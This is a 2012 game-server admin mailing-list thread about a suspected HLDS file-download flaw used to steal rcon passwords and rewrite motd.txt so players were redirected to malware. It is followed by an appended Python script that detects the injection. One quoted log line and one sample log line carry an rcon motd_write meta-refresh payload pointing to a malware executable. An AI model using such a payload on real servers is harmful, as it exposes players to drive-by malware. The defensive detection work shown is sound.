Having the password on the command line would indeed be a concern for us if we didn't have our box to ourselves.

-Ken

On Jul 3, 2012 7:44 PM, "Jesse Molina" <[email protected]> wrote:

> Yes, it does.
>
> I pointed this out to the author awhile ago privately.
>
> Just for clarity, to make sure nobody else thinks it's a good idea, IT IS NOT A GOOD IDEA. =)
>
> This is the same reason that programs like sudo and ssh make it very difficult for you to pass passwords on the command line.
>
> There are really very few things you can do to mitigate significant security issues like this one. The best advice is to run nothing but game servers on the host involved.
>
> doc wrote:
>
>> Is this an ok practice? I never thought about having my rcon password in my file - I guess it would be more secure if you just start it up with the rcon password in the string? Doesn't it show up when you run top/htop though?
>>
>> On Tue, Jul 3, 2012 at 12:05 PM, Ken Bateman <[email protected]> wrote:
>>
>>> For quite a while we have been careful to specify our tf2 rcon passwords on the command line, not a config file, because we suspected the existence of an exploit like this.
>>>
>>> It's possible that the vulnerability might be in tcadmin.
>>>
>>> -Ken
>>>
>>> On Jul 3, 2012 2:54 PM, "c0m4r" <[email protected]> wrote:
>>>
>>>> There is an exploit in q3 engine named "q3dirtrav", which allows players to download any of server files, including server configuration (server.cfg). Today I found evidence of possible existence of the same exploit in HLDS. As a company we host hundreds of servers. We received many reports from our customers about strange HTTP refresh meta tag in the motd.txt of their servers, which leads to "http *//free -leaks *com/cstrike*exe". The problem has affected several different servers, unrelated to each other, with very different RCON passwords (but most were very strong).
>>>>
>>>> Here's what I have found in logfiles:
>>>>
>>>> Rcon from 178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks *com/cstrike*exe">
>>>>
>>>> This "cstrike.exe" contains some kind of a virus. (Note: I've replaced dot with asterisk and spaces)
>>>>
>>>> As you can see the attacker knew the RCON password of each server. Then I found "server.CFG.ztmp" file in cstrike of each server, which was attacked. For me that means that the attacker was able to download server.cfg exactly the same way as maps, models or sounds.
>>>>
>>>> _______________________________________________
>>>> To unsubscribe, edit your list preferences, or view the list archives, please visit:
>>>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
>
> --
> # Jesse Molina
> # Mail = [email protected]
> # Cell = 1-602-323-7608
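As an added example, not code from the thread or from Valve, a small Python checker for the two indicators c0m4r describes: rcon motd_write commands in the server log that inject an HTTP refresh meta tag, and a server.cfg.ztmp leftover in the game directory. The log line format is an assumption reconstructed from the one excerpt quoted above, the sample lines are constructed, and the redirect URL is a placeholder.

```python
import re
import tempfile
from pathlib import Path

# Log line shape reconstructed from the one excerpt in the thread (an assumption):
#   Rcon from <ip>:<port>:rcon <challenge> <password> <command ...>
RCON_RE = re.compile(
    r"^Rcon from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+):rcon "
    r"(?P<challenge>\d+) (?P<password>\S+) (?P<command>.+)$")
# The thread's indicator: a motd_write whose payload carries an HTTP refresh meta tag.
META_REFRESH_RE = re.compile(r"<META\s+HTTP-EQUIV=Refresh", re.IGNORECASE)

def parse_rcon_line(line):
    """Return the rcon fields of one log line, or None if it is not an rcon line."""
    m = RCON_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["password"] = "<redacted>"  # never copy the rcon password into alert output
    return rec

def find_motd_redirects(lines):
    """Return (source_ip, command) for each rcon motd_write that injects a refresh tag."""
    hits = []
    for line in lines:
        rec = parse_rcon_line(line)
        if (rec and rec["command"].startswith("motd_write")
                and META_REFRESH_RE.search(rec["command"])):
            hits.append((rec["ip"], rec["command"]))
    return hits

def find_cfg_ztmp(game_dir):
    """List server.cfg.ztmp leftovers (any letter case) in a game directory."""
    return sorted(p.name for p in Path(game_dir).iterdir()
                  if p.name.lower() == "server.cfg.ztmp")

def demo_ztmp_scan():
    """Scan a constructed cstrike directory that holds the artefact c0m4r found."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("server.cfg", "server.CFG.ztmp", "motd.txt"):
            Path(d, name).write_text("")
        return find_cfg_ztmp(d)

# Constructed sample log lines; the redirect URL is a placeholder, not the real one.
SAMPLE_LOG = [
    'L 07/03/2012 - 14:01:02: "doc<3><STEAM_0:1:1><CT>" say "gg"',
    'Rcon from 203.0.113.7:15518:rcon 1399145428 s3cret motd_write '
    '<META HTTP-EQUIV=Refresh CONTENT="0 URL=http://attacker.example/cstrike.exe">',
    'Rcon from 198.51.100.9:27015:rcon 77 s3cret changelevel de_dust2',
]
```

Run `find_motd_redirects` over a real log only after adjusting RCON_RE to the actual line format of your HLDS build, and treat any hit as a sign that the rcon password is already known to the sender.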

